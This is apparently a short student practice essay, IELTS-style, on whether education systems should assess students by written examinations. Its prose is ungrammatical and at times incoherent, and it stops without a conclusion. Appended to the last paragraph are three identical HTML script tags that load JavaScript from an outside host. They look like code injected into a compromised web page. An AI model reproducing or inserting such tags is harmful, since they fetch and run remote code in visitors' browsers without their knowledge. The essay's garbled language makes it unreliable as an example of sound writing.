In most of the education systems, students are assessed by written examinations. Do you think it is a good idea or not? Give your reasons.

No one can cast a shadow of doubt on the fact that systems of education are facing big problems by assessing the students. The one way of assessment is written examinations which have advantages and disadvantages.

According to recent researches, there is no denying the fact that most of teachers in most of developed countries are focusing to teach the lessons with playing, and at the end of terms, all students assess base their knowledge of operation not just written exams.

Whereas the fundamental essence of assessment emphasises the significance of education systems, the corresponding impacts of assessment such as written and verbal examinations are acknowledged, and students could be inferred evidently from lessons, which the potential implications of assessment as well as examinations are presumed.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>